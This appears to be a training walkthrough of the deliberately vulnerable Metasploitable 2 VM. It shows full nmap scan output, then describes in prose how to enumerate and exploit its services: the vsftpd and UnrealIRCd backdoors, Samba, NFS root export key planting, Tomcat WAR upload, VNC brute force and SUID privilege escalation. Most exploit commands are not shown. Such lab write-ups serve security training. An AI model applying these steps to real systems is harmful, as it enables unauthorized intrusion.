Metasploitable 2
Metasploitable 2 is a purposely vulnerable virtual machine that is designed for security testing, training, and educational purposes. Here, we have complete walkthrough of the machine.
Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.204.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48158/udp mountd
| 100005 1,2,3 53046/tcp mountd
| 100021 1,3,4 39352/udp nlockmgr
| 100021 1,3,4 52660/tcp nlockmgr
| 100024 1 36532/tcp status
|_ 100024 1 37990/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Capabilities flags: 43564
| Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp open irc UnrealIRCd (Admin email [email protected])
| irc-info:
| users: 2
| servers: 1
| lusers: 2
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open status 1 (RPC #100024)
43137/tcp open java-rmi GNU Classpath grmiregistry
52660/tcp open nlockmgr 1-4 (RPC #100021)
53046/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds
Enumeration
Netbios Enumeration
We can provide the range to nbstat command on Kali and enumerate complete subnet.
We can see the machine name. Simlarly, we can run an nmap scan with nbstat script.
Windows also have inbuilt tools to enumerate Netbios. Similarly we can check for current cache result of Netbios.
SMB Enumeration
Nmap Provides a number of scripts for SMB Enumeration.
For example we can use script for OS Discovery through smb.
Similalry we can list shares with smbclient
Similarly, we can check if we have read/write access on shares with smbmap.
We can see that we have write access on tmp directory which can be useful in exploitation phase.
We can run an automated script enum4linux to extract usernames as well.
SMTP Enumeration
We can also gather information about a host or network from vulnerable mail servers. The Simple Mail Transport Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.
We can use the VRFY commands to verify if users on SMTP servers exits.
We can use a meterpreter module to enumerate SMTP users.
We can use smtp-user-enum to verify list of users if they exists or not.
NFS Enumeration
We can try to list down shares available with showmount.
We can see that root folder is shared and we can mount it and exploit it.
Port 21 FTP Exploitation Metasploitable2
Scanning
Port 21 is open on Metasploitable2 and is running vsftpd 2.3.4 which has an inbuilt backdoor.
Manual Exploitation vsftpd 2.3.4
The trick is to add" :) " at the end of username. It opens a backdoor on port 6200. Which you can now connect.
Manual Exploitation vsftpd 2.3.4 Method 2
We can use exploits from exploit-db. Search for exploit using searchsploit
Now copy the exploit
Now run it against the target. We will get the shell
FTP exploitation - Metasploit
Search for Vsftd in metasploit
Now use it, select the target and run it. We will get the shell.
Port 445 SMB Exploitation Metasploitable2
Scanning with vuln and vulners SMB port
As we did not get exact version of smb service, we can try metasploit auxillary module to check smb version.
We can see that we have scanner at number 9.
Running it we get the samba version (Samba 3.0.20-Debian).
Now let us see what we get at searchsploit.
So, we have a metasploit module to exploit the vulnerability.
Samba exploitation Metasploitable 2 with Metasploit
Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit
Use smbclient to connect to shares. We can see that we can connect anonymously.
Here we have tmp share. If it writable we can leverage it to get a shell.
Now connect with it and check the available commands with help command.
Now open a listener on the attacking machine.
Now use the following command
And we get the shell
SMB writable share - Wide links
Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.
Now, we can use a meatasploit module to exploit it.
Now, we have a share rootfs where we can access the complete file system.
Port 1524 Remote Shell Metasploitable2
We saw an open port 1524 on the machine. We can try to fingerprint it with version scan for the running service.
We can see that we have a bind shell on the port. We can try connecting to it.
And we are successfully able to connect to our backdoor.
Port 5900 VNC Exploitation Metasploitable2
First scan for the service
The port is open. However, we have not found any vulnerabilities. We will try to brute force it with metasploit.
Bruteforcing VNC Metasploit
search for VNC auxillary modules
We have the vnc_login module. Select the module and see options.
Set the username as root and set the target. We will be using default Metasploit wordlist.
Run the exploit and we will have our password which is password.
Now, we can use VNC viewer to connect to target.
Port 6667 ircd Exploitation Metasploitable2
Scanning port 6667
First scan the port with vuln script so see if we get some useful information
We can see that it finds out that the port may have trojan in it.
Vulnerability Assessment
Let us see if searchsploit finds something.
We do have UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) .
Unreal IRCD Exploitation with Metasploit
Let us fire up metasploit and exploit it.
Set the payload as cmd/unix/bind_ruby .
Now run it, and we will get the shell.
Port 2049 NFS Exploitation Metasploitable 2
First quickly scan the target.
We can see that the port is open. Now we can see what NFS shares are available to be mounted.
┌──(kali㉿kali)-[~] └─$ showmount -e 192.168.204.136
Export list for 192.168.204.136: / *
The command showmount -e 192.168.204.136 is used to display the list of directories shared by an NFS (Network File System) server located at the IP address 192.168.204.136.
The output you provided indicates that there is one shared directory available on the NFS server at that IP address. Here's the breakdown of the output:
Export list for 192.168.204.136:: This line indicates that the following list displays the directories that are exported (shared) by the NFS server at the specified IP address./ *: This line specifies the shared directory and its export options. In this case,/represents the root directory of the file system, and*indicates that it is exported to all hosts. This means that any host in the network that has access to the NFS server can mount this directory and access its contents.
In summary, the output indicates that the NFS server at 192.168.204.136 is sharing its root directory (/) to all hosts on the network.
Now, we can mount it.
Now we can generate a SSH key.
Now copy the public key to target ssh folder.
Now, append it to authorized keys file.
We can now connect to our machine with SSH. (Having errors)
Ports 512,513,514 remote services exploitations - Metasploitable 2
TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation).
Lets scan if these ports are open.
Now we can connect to it.
Port 3632 distccd exploitation - Metasploitable 2
This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice.
Let us scan it.
We can now use metasploit to exploit it.
Port 1099 - Java-rmi exploitation - Metasploitable 2
Let us first scan the target.
Now, we can use metasploit JAVA RMI module to exploit it.
Port 5432 Postgresql Exploitation - Metasploitable 2
Let us first scan the target.
Let us exploit it.
Apache Tomcat/Coyote JSP engine 1.1 Exploitation
Run a nmap scan against the target
if we browse the site, we can view the homepage. The tomcat manager requires a username and password.
We have a brute force module for bruteforcing the login credentials in Metasploit
Here we can see the cracked password. It is tomcat:tomcat
And we are able to login to the manager with the found credentials.
If we look closely we have a field for uploading WAR Files. Create a payload.
Now upload it.
Open a netcat listener
Now browse to the page.
And we have a connection.
Privilege Escalation with SUID Binaries
Find the files with SUID Binaries
We have got lots of binaries with SUID bit set and I am gonna use nmap here to do the privilege escalation.
Our effective uid is root.
Last updated